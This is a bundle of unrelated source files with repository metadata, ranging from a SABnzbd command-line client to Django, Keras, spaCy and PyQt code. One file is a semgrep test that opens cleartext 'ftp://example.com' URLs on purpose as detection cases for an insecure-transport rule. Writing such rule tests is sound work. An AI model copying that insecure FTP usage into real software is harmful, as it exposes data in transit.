msg += "\nEnvironment variables:\n\tSABCLICFG=~/.nzbrc (default)\n\tDEBUG=1\t\t\t\t| Enable debug\n"
sys.stderr.write(msg + '\n')
sys.exit(exitval)
def parse_options(sabnzbd, options):
''' Parse Cli options '''
default_opts = ("hj:H:P:u:p:a:w:" , ["help" , "job-option=", "hostname=", "port=", "username=", "password=", "apikey=", "watch="])
command = None
command_args = None
try:
opt , args = getopt.getopt(options, default_opts[0], default_opts[1])
except getopt.GetoptError:
usage(2)
for option , arguement in opt:
if option in ("-h", "--help"):
usage(2)
elif option in ("-j", "--job-option"):
self.job_option = str(arguement)
elif option in ("-H", "--hostname"):
sabnzbd.config['host'] = str(arguement)
elif option in ("-P", "--port"):
sabnzbd.config['port'] = str(arguement)
elif option in ("-u", "--username"):
sabnzbd.config['password'] = str(arguement)
elif option in ("-p", "--password"):
sabnzbd.config['password'] = str(arguement)
elif option in ("-a", "--apikey"):
sabnzbd.config['apikey'] = str(arguement)
elif option in ("-w", "--watch"):
sabnzbd.watchdelay = int(arguement)
if len(args) == 0:
command = 'queue'
else:
command = args[0]
if len(args) > 1:
command_args = args[1:]
return (command, command_args)
def parse_config(config):
''' Parse config file for server info '''
parser = ConfigParser.ConfigParser()
config_dict = {}
try:
config_file = open(config)
parser.readfp(config_file)
config_file.close()
except IOError:
usage(1)
sys.stderr.write('Unable to open ' + config + '\n')
try:
for each in ('host', 'port', 'username', 'password', 'apikey'):
config_dict[each] = parser.get('server', each)
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
sys.stderr.write('Unable to parse ' + config + '\n')
sys.stderr.write('Format should be:\n')
sys.stderr.write('[server]\n')
sys.stderr.write('host = <sabnzbd server>\n')
sys.stderr.write('port = <sabnzbd port>\n')
sys.stderr.write('username = <sabnzbd name> | None\n')
sys.stderr.write('password = <sabnzbd password> | None\n')
sys.stderr.write('apikey = <sabnzbd apikey> | None\n')
usage(1)
return config_dict
def run_commands(sabnzbd, command, command_arg):
if command in ('rename', 'move', 'priority', 'postprocessing', 'pause', 'resume', 'details'):
if command_arg != None:
command_arg[0] = sabnzbd.getNZO_id(command_arg[0])
if command_arg[0] == None:
print tc.red + 'Error:' + tc.end + ' No NZO_ID returned, please make sure you provided the correct index id.\n'
return 2
if command == 'delete':
if command_arg != None:
if command_arg[0] != 'all':
temp = None
for each in command_arg:
pretemp = sabnzbd.getNZO_id(each)
if pretemp:
temp = str(pretemp) + ','
else:
print tc.red + 'Error:' + tc.end + ' No NZO_ID returned, please make sure you provided the correct index id.\n'
if temp:
command_arg = [temp[:-1]]
else:
return 2
if sabnzbd.send_command(command, command_arg):
if command == 'queue':
sabnzbd.print_queue()
elif command == 'history':
if command_arg == None:
sabnzbd.print_history()
else:
print 'History Cleared'
print
elif command == 'details':
sabnzbd.print_details()
elif command == 'warnings':
sabnzbd.print_warnings()
elif command == 'version':
sabnzbd.print_version()
elif command == 'priority':
if sabnzbd.debug:
print 'New position in queue: ' + sabnzbd.retval
sabnzbd.command_status = sabnzbd.command_status.replace(sabnzbd.retval, "ok\n");
elif command == 'move':
value = sabnzbd.retval.split(' ')
if sabnzbd.debug:
print 'New position in queue: ' + value[0]
sabnzbd.command_status = sabnzbd.command_status.replace(sabnzbd.retval, "ok");
elif command == 'speedlimit':
if command_arg[0] == '0':
print 'Speedlimit set to: Unlimited'
else:
print 'Speedlimit set to: ' + command_arg[0] + 'KB/s'
elif command in ('newapikey', 'shutdown', 'restart', 'queuecompleted'):
print command + ' -> ' + sabnzbd.command_status
elif command in ('addurl', 'addfile', 'addid', 'delete', 'pause', 'resume', 'rename', 'postprocessing'):
if sabnzbd.debug:
print command + ' -> ' + sabnzbd.command_status
else:
print 'No command run: ' + sabnzbd.url
if command in ('newapikey'):
print sabnzbd.command_status
def main():
''' Command line front end to sabnzbd+ '''
configFile = os.environ.get("SABCLICFG");
if configFile == None:
configFile = os.environ['HOME'] + "/.nzbrc"
commands = None
if not os.path.exists(configFile):
sys.stderr.write('\nUnable to open ' + configFile + '\n\n')
else:
config_dict = parse_config(configFile)
sabnzbd = SABnzbdCore(config_dict)
sabnzbd.debug = os.environ.get("DEBUG");
if sabnzbd.debug:
print 'SABnzbd+ CLI ' + VERSION + '\n'
else:
print
command, command_arg = parse_options(sabnzbd, sys.argv[1:])
sabnzbd.setConnectionVariables()
if sabnzbd.debug:
print 'command:' + str(command) + ' - ' + str(command_arg)
if sabnzbd.watchdelay:
if command not in ('warnings', 'queue', 'details', 'history'):
print tc.red + tc.bold + 'WARNING:' + tc.end + ' Watch can not be used in conjunction with the "'+ command + '" command.'
print ' Check help screen for valid watch commands\n'
else:
try:
sabnzbd.watch(command, command_arg)
except KeyboardInterrupt:
print '\nCatched CTRL-C, exiting watch\n'
except:
print 'General exception in watch'
else:
run_commands(sabnzbd, command, command_arg)
if command in ('move', 'addurl', 'addfile', 'addid', 'delete', 'priority', 'resume', 'pause', 'temppause', 'rename', 'postprocessing'):
run_commands(sabnzbd, 'queue', None)
if sabnzbd.debug:
print command + ' -> ' + sabnzbd.command_status
if __name__ == '__main__':
main()
sys.exit(0)
|
[
"gh@tobiasussing.dk"
] |
gh@tobiasussing.dk
|
dab6144f837dc47e6411c03a43353b5968913916
|
8659a70b1a210bc0c8eceac7fb6152e42ebec8a2
|
/ch4/bmi/13-bmi-plot.py
|
19d7c858cfdb98a99c331833e33afb18885b6a0f
|
[] |
no_license
|
boossiman2/Python_web
|
49482575a54fc89b430891140bb48245a62af9e4
|
50b40cacff3613c3b413bd25de23ea8be3a70b7e
|
refs/heads/master
| 2018-11-08T03:30:13.606773
| 2018-08-28T12:33:49
| 2018-08-28T12:33:49
| 41,590,382
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 535
|
py
|
import matplotlib.pyplot as plt
import pandas as pd
# Pandas로 CSV 파일 읽어 들이기
tbl = pd.read_csv("bmi.csv", index_col=2)
# 그래프 그리기 시작
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
#서브 플롯 전용 - 지정한 레이블을 임의의 색으로 칠하기
def scatter(lbl, color):
b = tbl.loc[lbl]
ax.scatter(b["weight"],b["height"], c=color, label=lbl)
scatter("fat", "red")
scatter("normal", "yellow")
scatter("thin", "purple")
ax.legend()
plt.savefig("bmi-test.png")
#plt.show()
|
[
"boossiman2@gmail.com"
] |
boossiman2@gmail.com
|
313686d18990a07569702bf878347325817319fe
|
dff4bd6eaa4e157c8bd254f40c7551c6f8ff730e
|
/1st Place/team-member-a-execute-first/coldstart/predict/linear_regression.py
|
2bbd34da5755bac61e9572ee14573958814198c7
|
[] |
no_license
|
gopakumargeetha/power-laws-cold-start
|
9dd5d7c187de13dba2eae34ae667e1f139b37e43
|
3915f29335584e1cadd4fbf95c5265689896f90f
|
refs/heads/master
| 2022-12-19T10:04:48.603324
| 2020-03-14T02:26:06
| 2020-03-14T02:26:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,721
|
py
|
"""
Making predictions using just linear regression.
"""
import numpy as np
from tqdm import tqdm_notebook
from scipy.optimize import minimize
from coldstart.utils import _is_day_off, _get_next_weekday, group_sum, _is_holiday
from coldstart.utils import _get_next_date
class LinearRegression(object):
"""
Encapsulation of everything needed for making predictions
using multiple linear regression models.
"""
def __init__(self, metadata, use_holidays=True, input_days=7):
self.train_data = {
'hourly': {i:{} for i in range(24)},
'daily': {i:{} for i in range(7)},
'weekly': {i:{} for i in range(2)},
}
self._metadata = metadata
self._use_holidays = use_holidays
self._input_days = input_days
def prepare_data(self, df):
self._prepare_hourly_data(df)
self._prepare_daily_data(df)
self._prepare_weekly_data(df)
def _prepare_hourly_data(self, df):
for series_id in tqdm_notebook(df.series_id.unique(), desc='Preparing data'):
sub_df = df[df.series_id == series_id]
consumption = sub_df.consumption.values
is_day_off = self._get_is_day_off_from_df(sub_df)
for n_days in range(2, 2 + self._input_days):
for start_idx in range(len(is_day_off)-n_days):
key = ''.join([str(i) for i in is_day_off[start_idx:start_idx + n_days]])
x = np.zeros((24, n_days-1))
for i in range(n_days -1):
x[:, i] = consumption[(start_idx + i)*24:(start_idx + i + 1)*24]
val_idx = start_idx + n_days - 1
y = consumption[val_idx*24:(val_idx+1)*24]
y_mean = np.mean(y)
for offset in range(24):
self._add_train_data(x[offset:offset+1]/y_mean, y[offset:offset+1]/y_mean,
'hourly', offset, key)
def _prepare_daily_data(self, df):
for series_id in tqdm_notebook(df.series_id.unique(), desc='Preparing data'):
sub_df = df[df.series_id == series_id]
consumption = sub_df.consumption.values
consumption = group_sum(consumption, 24)
is_day_off = self._get_is_day_off_from_df(sub_df)
for input_days in range(1, 1 + self._input_days):
for start_idx in range(len(is_day_off)-input_days-7):
key = ''.join([str(i) for i in is_day_off[start_idx:start_idx + input_days]])
x = consumption[start_idx: start_idx + input_days]
x = np.expand_dims(x, axis=0)
val_idx = start_idx + input_days
y = consumption[val_idx:val_idx + 7]
y_mean = np.mean(y)
for offset in range(7):
final_key = key + str(is_day_off[val_idx + offset])
self._add_train_data(x/y_mean, [y[offset]/y_mean], 'daily', offset, final_key)
def _prepare_weekly_data(self, df):
for series_id in tqdm_notebook(df.series_id.unique(), desc='Preparing data'):
sub_df = df[df.series_id == series_id]
consumption = sub_df.consumption.values
consumption = group_sum(consumption, 24)
is_day_off = self._get_is_day_off_from_df(sub_df)
for input_days in range(1, 1 + self._input_days):
for start_idx in range(len(is_day_off)-input_days-14):
key = ''.join([str(i) for i in is_day_off[start_idx:start_idx + input_days]])
x = consumption[start_idx: start_idx + input_days]
x = np.expand_dims(x, axis=0)
val_idx = start_idx + input_days
y = consumption[val_idx:val_idx + 14]
y = group_sum(y, 7)
y_mean = np.mean(y)
for offset in range(2):
final_key = key
self._add_train_data(x/y_mean, [y[offset]/y_mean], 'weekly', offset, final_key)
def _add_train_data(self, x, y, window, offset, key):
if key in self.train_data[window][offset]:
self.train_data[window][offset][key] = {
'n': self.train_data[window][offset][key]['n'] + 1,
'x': np.concatenate([x, self.train_data[window][offset][key]['x']], axis=0),
'y': np.concatenate([y, self.train_data[window][offset][key]['y']], axis=0),
}
else:
self.train_data[window][offset][key] = {
'n': 1,
'x': x,
'y': y,
}
def fit(self):
for window in tqdm_notebook(self.train_data, desc='Fitting'):
for offset in self.train_data[window]:
iterator = tqdm_notebook(
self.train_data[window][offset],
leave=False,
desc='Fitting window: %s offset: %i' % (window, offset))
for key in iterator:
x = self.train_data[window][offset][key]['x']
y = self.train_data[window][offset][key]['y']
n_parameters = x.shape[1]
if window == 'hourly':
x0 = np.ones(n_parameters)/n_parameters
elif window == 'daily':
x0 = np.ones(n_parameters)/n_parameters
elif window == 'weekly':
x0 = np.ones(n_parameters)/n_parameters*7
output = minimize(
_cost_function, x0,
args=(x, y),
bounds=[(0, np.inf)]*n_parameters)
weights = output.x
self.train_data[window][offset][key]['weights'] = weights
self.train_data[window][offset][key]['nmae'] = _cost_function(
weights, x, y
)
def predict(self, window, series_id, consumption, weekdays, dates):
if window == 'hourly':
return self._hourly_predict(series_id, consumption, weekdays, dates)
elif window == 'daily':
return self._daily_predict(series_id, consumption, weekdays, dates)
else:
return self._weekly_predict(series_id, consumption, weekdays, dates)
def _hourly_predict(self, series_id, consumption, weekdays, dates):
is_day_off = self._get_is_day_off(weekdays, series_id, dates)
is_day_off = is_day_off[-self._input_days:]
is_day_off.append(self._is_day_off(_get_next_weekday(weekdays[-1]), series_id,
_get_next_date(dates[-1])))
key = ''.join([str(i) for i in is_day_off])
# print(key, weekdays)
while 1:
if key in self.train_data['hourly'][0]:
break
else:
# print(key, 'not found')
key = key[1:]
if not len(key):
raise KeyError('Empty key')
consumption = consumption[-(len(key)-1)*24:]
x = np.zeros((24, len(key)-1))
for i in range(len(key)-1):
x[:, i] = consumption[i*24:(i + 1)*24]
pred = []
for offset in range(24):
weights = self.train_data['hourly'][offset][key]['weights']
pred.append(x[offset:offset+1].dot(weights)[0])
return np.array(pred)
def _daily_predict(self, series_id, consumption, weekdays, dates):
is_day_off = self._get_is_day_off(weekdays, series_id, dates)
is_day_off = is_day_off[-self._input_days:]
org_key = ''.join([str(i) for i in is_day_off])
pred = []
for offset in range(7):
weekday = weekdays[-1]
date = dates[-1]
for _ in range(offset+1):
weekday = _get_next_weekday(weekday)
date = _get_next_date(date, offset+1)
key = org_key + str(self._is_day_off(weekday, series_id, date))
while 1:
if key in self.train_data['daily'][offset]:
break
else:
# print(key, 'not found')
key = key[1:]
if not len(key):
msg = 'Key not found: %s\tWindow: %s\tOffset: %s' % (org_key, 'daily', offset)
raise KeyError(msg)
x = consumption[-(len(key)-1)*24:]
x = group_sum(x, 24)
x = np.expand_dims(x, axis=0)
weights = self.train_data['daily'][offset][key]['weights']
# print(consumption.shape, x.shape, weights.shape, key)
pred.append(x.dot(weights)[0])
return np.array(pred)
def _weekly_predict(self, series_id, consumption, weekdays, dates):
is_day_off = self._get_is_day_off(weekdays, series_id, dates)
is_day_off = is_day_off[-self._input_days:]
org_key = ''.join([str(i) for i in is_day_off])
pred = []
for offset in range(2):
key = org_key[:]
while 1:
if key in self.train_data['weekly'][offset]:
break
else:
# print(key, 'not found')
key = key[1:]
if not len(key):
msg = 'Key not found: %s\tWindow: %s\tOffset: %s' % (org_key, 'weekly', offset)
raise KeyError(msg)
x = consumption[-(len(key))*24:]
x = group_sum(x, 24)
x = np.expand_dims(x, axis=0)
weights = self.train_data['weekly'][offset][key]['weights']
# print(consumption.shape, x.shape, weights.shape, key)
pred.append(x.dot(weights)[0])
return np.array(pred)
def _get_is_day_off(self, weekdays, series_id, dates):
weekdays = weekdays[::24]
dates = dates[::24]
is_day_off = [self._is_day_off(weekday, series_id, date) \
for weekday, date in zip(weekdays, dates)]
return is_day_off
def _is_day_off(self, weekday, series_id, date):
ret = _is_day_off(series_id, weekday, self._metadata)
if self._use_holidays:
ret = ret or _is_holiday(date)
return int(ret)
def _get_is_day_off_from_df(self, df):
if self._use_holidays:
is_day_off = df.is_holiday.values[::24]
else:
is_day_off = df.is_day_off.values[::24]
is_day_off = [int(value) for value in is_day_off]
return is_day_off
def _cost_function(params, X, y):
return np.mean(np.abs(y - X.dot(params)))
|
[
"caseyfitz@users.noreply.github.com"
] |
caseyfitz@users.noreply.github.com
|
51ef9ebcaa98ebc7587f1a24b2cf0e33fca79a0f
|
127ed1ba90dcced8cce8366a5139973f1d21c372
|
/python/lang/security/audit/insecure-transport/urllib/insecure-urlopener-open-ftp.py
|
edb25f3b511977c953c437733a648bdd97fd483d
|
[] |
no_license
|
Silentsoul04/semgrep-rules-1
|
f0c53e04b4239555a688bca687340af4736d2514
|
81b81481c0a81e45d3ffba8d60dd98491a1b0446
|
refs/heads/master
| 2022-12-22T15:41:34.399652
| 2020-09-13T14:59:38
| 2020-09-13T14:59:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,388
|
py
|
from urllib.request import URLopener
def test1():
od = URLopener()
# ruleid: insecure-urlopener-open-ftp
od.open("ftp://example.com")
def test1_ok():
od = URLopener()
# ok: insecure-urlopener-open-ftp
od.open("ftps://example.com")
def test2():
od = URLopener()
# ruleid: insecure-urlopener-open-ftp
url = "ftp://example.com"
od.open(url)
def test2_ok():
od = URLopener()
# ok: insecure-urlopener-open-ftp
url = "ftps://example.com"
od.open(url)
def test3():
# ruleid: insecure-urlopener-open-ftp
URLopener().open("ftp://example.com")
def test3_ok():
# ok: insecure-urlopener-open-ftp
URLopener().open("ftps://example.com")
def test4():
# ruleid: insecure-urlopener-open-ftp
url = "ftp://example.com"
URLopener().open(url)
def test4_ok():
# ok: insecure-urlopener-open-ftp
url = "ftps://example.com"
URLopener().open(url)
def test5(url = "ftp://example.com"):
# ruleid: insecure-urlopener-open-ftp
URLopener().open(url)
def test5_ok(url = "ftps://example.com"):
# ok: insecure-urlopener-open-ftp
URLopener().open(url)
def test6(url = "ftp://example.com"):
od = URLopener()
# ruleid: insecure-urlopener-open-ftp
od.open(url)
def test6_ok(url = "ftps://example.com"):
od = URLopener()
# ok: insecure-urlopener-open-ftp
od.open(url)
|
[
"manhnguyen510@gmail.com"
] |
manhnguyen510@gmail.com
|
178b53756b1a7f1ccec51c10e04445888b4f6264
|
6f8e52d3c03d7a4c82a01dbaaca96719d8ad356f
|
/reader/migrations/0002_article_publish_date.py
|
41d8ce661d41cc22b036839a5db6864080b75c60
|
[] |
no_license
|
maest/chwlang
|
5df4c624e4c703192fdea8b03d1448a959d12368
|
72a81a0aba80af6362fe78dcd37ba972e150bf8f
|
refs/heads/master
| 2022-12-16T22:45:40.865007
| 2019-02-25T19:12:07
| 2019-02-25T19:12:07
| 199,169,668
| 0
| 0
| null | 2022-12-08T01:04:54
| 2019-07-27T13:40:39
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 379
|
py
|
# Generated by Django 2.0.2 on 2018-04-15 18:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('reader', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='article',
name='publish_date',
field=models.DateTimeField(null=True),
),
]
|
[
"b.panait@gmail.com"
] |
b.panait@gmail.com
|
bd60096a6677e31ccf2f53c0600f73f693a5370f
|
12c43be8658110886f71bd792653c7f2c7d9b016
|
/project/app/apps.py
|
d85135acda52ac4478cffadffcfcb0eeb6b61525
|
[] |
no_license
|
umum253/django-generic-project
|
8caf11e19d31766be0e651d979341591020f763c
|
60042cf8fea5a0b8ca3defe18fb96e0b5044e6fe
|
refs/heads/main
| 2023-06-29T23:49:27.318825
| 2021-08-06T10:53:03
| 2021-08-06T10:53:03
| 393,347,584
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
from django.apps import AppConfig
class SampleAppConfig(AppConfig):
name = 'app'
verbose_name = 'アプリ'
|
[
"fkwpostpost@gmail.com"
] |
fkwpostpost@gmail.com
|
eafb0fe40ae0971dfb68a338fa1be014d9acd123
|
80fe30a676bdc36b64eb14f6a751cc2591b9eb5e
|
/Session19_Input_Files_Exceptions/src/m2_console_input.py
|
74c5b56c113dc594384339b0ffe2a713c94a4df0
|
[] |
no_license
|
rhinomikey/Python-Projects
|
46edbd89a954d3f018957e1df37f14cb51c743ad
|
7f5906ce0cde57a5537a3068513575da32b33df5
|
refs/heads/master
| 2021-10-29T15:18:30.952074
| 2021-10-19T21:25:32
| 2021-10-19T21:25:32
| 128,818,749
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,111
|
py
|
"""
This module demonstrates how to INPUT from the CONSOLE:
-- ints (integers)
-- floats (floating point numbers)
-- strings.
Authors: David Mutchler, Valerie Galluzzi, Mark Hays, Amanda Stouder,
their colleagues and Nathan Gupta. January 2016.
""" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
########################################################################
# DONE: 2. Read and run this program. Then do the following problems,
# putting your answers RIGHT HERE IN THIS DOCUMENT.
#
# Write a line of code that would input an INTEGER from the console,
# storing the integer in a variable called 'x'.
# Write your line here: x = int(input('Please input an integer(whole number): ' ))
#
# Write a line of code that would input an FLOAT from the console,
# storing the float in a variable called 'x'.
# Write your line here: x = float(input('Please input a decimal number: '))
#
# Write a line of code that would input an STRING from the console,
# storing the string in a variable called 'x'.
# Write your line here: x = input('Please type any word you choose: ')
#
# What happens if you (the user) enter something OTHER than an integer
# (e.g., you enter 4 3 or five or 4.5 -- try them!)
# when running the input_until_a_SENTINEL_value example?
# Put your answer here: There is an error that is raised.
#
# After you have PUT YOUR ANSWERS IN THIS FILE as described above,
# change the above TODO to DONE.
########################################################################
def main():
""" Calls the other functions in this module to demo CONSOLE IO. """
input_a_string()
input_an_integer()
input_a_float()
input_until_a_SENTINEL_value()
########################################################################
# Example: how to INPUT a STRING from the Console.
########################################################################
def input_a_string():
print()
print('--------------------------------------------------')
print('Demonstrating CONSOLE INPUT of a STRING:')
print('--------------------------------------------------')
name = input('Enter your name: ')
print('Hi, ' + name + '! ', name, '!. ', name)
print(' Sorry, I have the hiccups...')
########################################################################
# Example: how to INPUT an INTEGER from the Console.
########################################################################
def input_an_integer():
print()
print('--------------------------------------------------')
print('Demonstrating CONSOLE INPUT of an INTEGER:')
print('--------------------------------------------------')
age = int(input('How old are you? '))
print('That is ' + str(age * 12) + ' months!')
if age >= 18:
print('You are old enough to vote, nice!')
else:
print('You will be able to vote in ' + str(18 - age) + ' years.')
########################################################################
# Example: how to INPUT a FLOAT (floating point number) from the Console
########################################################################
def input_a_float():
print()
print('--------------------------------------------------')
print('Demonstrating CONSOLE INPUT of a FLOATING POINT number:')
print('--------------------------------------------------')
money = float(input('How much money do you have? '))
potatoes_today = round((money / 6.46) * 10)
potatoes_1900 = round((money / 0.140) * 10)
print('According to Infoplease')
print('at http://www.infoplease.com/ipa/A0873707.html')
f_string1 = ' -- That will buy you {} pounds of potatoes today.'
f_string2 = ' -- That would buy you {} pounds of potatoes in 1900!'
print(f_string1.format(potatoes_today))
print(f_string2.format(potatoes_1900))
########################################################################
# Example: how to INPUT repeatedly until a SENTINEL value is entered.
########################################################################
def input_until_a_SENTINEL_value():
print()
print('--------------------------------------------------')
print('Demonstrating CONSOLE INPUT of integers')
print(' that STOPS when -1 is entered as a SENTINEL value.')
print('--------------------------------------------------')
print('I will COUNT how many PRIME numbers you give me.')
count = 0
while True:
n = int(input('Enter a positive integer (-1 to stop): '))
if n == -1:
break
if is_prime(n):
count = count + 1
print('You entered ' + str(count) + ' prime numbers.')
def is_prime(n):
""" Returns True if n is prime, else returns False. """
for k in range(2, (n // 2) + 1):
if n % k == 0:
return False
return True
# ----------------------------------------------------------------------
# Calls main to start the ball rolling.
# ----------------------------------------------------------------------
main()
|
[
"nmhuntemann@gmail.com"
] |
nmhuntemann@gmail.com
|
765bf9d191e29765530286712a31e9a39e6d6c5b
|
943d7ded0e464e3c3a4475c269eccde305865cf2
|
/natural_language_processing/Lemmatization.py
|
bfa9f27e3706ca4ce2e49bce557898592143df35
|
[] |
no_license
|
markikojr/DataScience
|
ab2d8af362012cf2985ce2c51d618605fd0f9223
|
40e1559ae511dfe8141bbfb17719aea099069b4a
|
refs/heads/master
| 2022-12-14T22:33:06.587191
| 2019-11-25T20:03:27
| 2019-11-25T20:03:27
| 200,712,164
| 1
| 0
| null | 2022-12-08T05:20:21
| 2019-08-05T18:56:22
|
Roff
|
UTF-8
|
Python
| false
| false
| 1,356
|
py
|
'''
This program shows some basics about Lemmatization using spacy library
'''
# Perform standard imports:
import spacy
nlp = spacy.load('en_core_web_sm')
print("---------- Create doc1 and apply tokenization, Part-or-speech tag and lemmatization:", "\n")
# Creating doc1
doc1 = nlp(u"I am a runner running in a race because I love to run since I ran today")
# Apply tokenization, Part-or-speech tag and lemmatization
for token in doc1:
print(token.text, '\t', token.pos_, '\t', token.lemma, '\t', token.lemma_)
print("---------- Define function to apply tokenization, Part-or-speech tag and lemmatization and better display:", "\n")
# Defining function to apply tokenization, Part-or-speech tag and lemmatization and better display
def show_lemmas(text):
for token in text:
print(f'{token.text:{12}} {token.pos_:{6}} {token.lemma:<{22}} {token.lemma_}')
print("---------- Create doc2 and apply function:", "\n")
# Create doc2 and apply function
doc2 = nlp(u"I saw eighteen mice today!")
show_lemmas(doc2)
print("---------- Create doc3 and apply function:", "\n")
# Create doc3 and apply function
doc3 = nlp(u"I am meeting him tomorrow at the meeting.")
show_lemmas(doc3)
print("---------- Create doc4 and apply function:", "\n")
# Create doc4 and apply function
doc4 = nlp(u"That's an enormous automobile")
show_lemmas(doc4)
|
[
"marcoscmartinsjr@gmail.com"
] |
marcoscmartinsjr@gmail.com
|
22ace41fc6d9774b05648c5ecdfc968f4e0cff95
|
c3fd71a80fadbf2b567911b2fd3aa2e16f6e5a39
|
/jpl/cli/config.py
|
416b87bb9928be54d40bddbd87ae709928795d04
|
[
"MIT"
] |
permissive
|
thejig/jpl
|
ae88037e82d414eb096282421d9b5e5231072ae7
|
be58184e29588f01e494f218354791516d481f3b
|
refs/heads/master
| 2021-01-05T06:23:48.639782
| 2020-06-12T02:18:17
| 2020-06-12T02:18:17
| 240,913,777
| 0
| 1
|
MIT
| 2020-02-28T01:08:52
| 2020-02-16T15:19:46
|
Python
|
UTF-8
|
Python
| false
| false
| 170
|
py
|
"""Configuration for CLI."""
################
# CLICK COLORS #
################
MARK_TO_COLOR = {
"PASSED": "green",
"WARNING": "yellow",
"FAILED": "red"
}
|
[
"leonkozlowski@gmail.com"
] |
leonkozlowski@gmail.com
|
b8930744c4984b31348d1c800cd832c48d9884c9
|
9a42f514882b7c2ae8e444ef8aa7ff9ed0a33b22
|
/src/metrics.py
|
199d83ebc298db78f56e93abfccd5fa0fea390b3
|
[] |
no_license
|
gusriobr/crop_seq_prediction
|
aa2809d11d73a6c4d278245fd4f5f4444f23139b
|
01721b5ff826322723bc8b5ea0ef696b12dfdb07
|
refs/heads/master
| 2023-01-23T22:21:57.800323
| 2020-12-10T11:21:37
| 2020-12-10T11:21:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,047
|
py
|
import tensorflow as tf
import keras.backend as K
def f1(y_true, y_pred):
y_pred = K.round(y_pred)
tp = K.sum(K.cast(y_true * y_pred, 'float'), axis=0)
tn = K.sum(K.cast((1 - y_true) * (1 - y_pred), 'float'), axis=0)
fp = K.sum(K.cast((1 - y_true) * y_pred, 'float'), axis=0)
fn = K.sum(K.cast(y_true * (1 - y_pred), 'float'), axis=0)
p = tp / (tp + fp + K.epsilon())
r = tp / (tp + fn + K.epsilon())
f1 = 2 * p * r / (p + r + K.epsilon())
f1 = tf.where(tf.math.is_nan(f1), tf.zeros_like(f1), f1)
return K.mean(f1)
def f1_loss(y_true, y_pred):
tp = K.sum(K.cast(y_true * y_pred, 'float'), axis=0)
tn = K.sum(K.cast((1 - y_true) * (1 - y_pred), 'float'), axis=0)
fp = K.sum(K.cast((1 - y_true) * y_pred, 'float'), axis=0)
fn = K.sum(K.cast(y_true * (1 - y_pred), 'float'), axis=0)
p = tp / (tp + fp + K.epsilon())
r = tp / (tp + fn + K.epsilon())
f1 = 2 * p * r / (p + r + K.epsilon())
f1 = tf.where(tf.math.is_nan(f1), tf.zeros_like(f1), f1)
return 1 - K.mean(f1)
|
[
"gusriobr@gmail.com"
] |
gusriobr@gmail.com
|
8b459ea6c51590e42fb2bdf49298dcfd689e92d7
|
612e80dad0b13450fd647b18301cfe3b7dc707e3
|
/SALab2/window.py
|
971507b85c93b4f9260fc36895032aa7e453dd5e
|
[] |
no_license
|
ozhenchuk/SysAn
|
a44f60367ca47cd10c84d3d02bcd073f3bf4427e
|
06d290b1e963794e156c8bc5870103062d92f574
|
refs/heads/master
| 2020-04-11T20:46:01.557157
| 2018-12-17T06:03:55
| 2018-12-17T06:03:55
| 161,516,342
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,537
|
py
|
import matplotlib.pylab as plb
import numpy as np
import sys
import time
##import yaml
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
import matplotlib.pyplot as plt
from iterator import Iterator
from PyQt4 import QtCore, QtGui
import os
class PlotManager(QtGui.QWidget):
def __init__(self, parent=None):
super(PlotManager, self).__init__(parent)
self.figure = plt.figure ()
self.canvas = FigureCanvas(self.figure)
self.toolbar = NavigationToolbar(self.canvas, self)
self.toolbar.hide()
self.zoombut = QtGui.QPushButton("Збільшити")
self.zoombut.clicked.connect(self.zoom)
self.panbut = QtGui.QPushButton("Перемістити")
self.panbut.clicked.connect(self.pan)
self.homebut = QtGui.QPushButton("Повністю")
self.homebut.clicked.connect(self.home)
self.savebut = QtGui.QPushButton("Зберегти")
self.savebut.clicked.connect(self.save)
layout = QtGui.QVBoxLayout()
buttonbox = QtGui.QHBoxLayout()
buttonbox.addWidget(self.zoombut)
buttonbox.addWidget(self.panbut)
buttonbox.addWidget(self.homebut)
buttonbox.addWidget(self.savebut)
layout.addLayout(buttonbox)
layout.addWidget(self.toolbar)
layout.addWidget(self.canvas)
self.setLayout(layout)
self.ax = self.figure.add_subplot(111)
def home(self):
self.toolbar.home()
def zoom(self):
self.toolbar.zoom()
def pan(self):
self.toolbar.pan()
def save(self):
timestr = time.strftime("%Y%m%d_%H%M%S", time.gmtime())
self.figure.savefig(f'{timestr}.png')
class mainWindow(QtGui.QWidget):
def __init__(self, parent = None):
super(mainWindow, self).__init__(parent)
settings = []
##with open("lang_uk.yaml") as f:
##settings.append(yaml.load(f))
self.polinombox = QtGui.QGroupBox("Задання поліномів")
self.setWindowTitle("Відновлення функціональної залежності")
self.lambdabox = QtGui.QGroupBox("Пошук λ")
self.inputbox = QtGui.QGroupBox("Вхідні та вихідні дані")
self.graphicbox = QtGui.QGroupBox("Графіки")
self.samplevolume = QtGui.QSpinBox()
self.samplevolume.setMinimum(1)
self.samplevolume.setMaximum(1000)
self.samplevolume.setValue(45)
self.samplevolume.setAlignment(QtCore.Qt.AlignLeft)
self.samplevolume.setFixedWidth(100)
self.langwin = QtGui.QComboBox()
self.langwin.addItems(["Українська", "English"])
self.langwin.currentIndexChanged.connect(self.LangChange)
self.langwin.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
langwinlayout = QtGui.QHBoxLayout()
self.langlab = QtGui.QLabel("Мова")
self.langlab.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
self.langlab.setAlignment(QtCore.Qt.AlignLeft)
langwinlayout.addWidget(self.langlab)
langwinlayout.addWidget(self.langwin)
langwinlayout.insertSpacing(1, 40)
langwinlayout.setAlignment(QtCore.Qt.AlignLeft)
self.filename = []
self.filebuttons = []
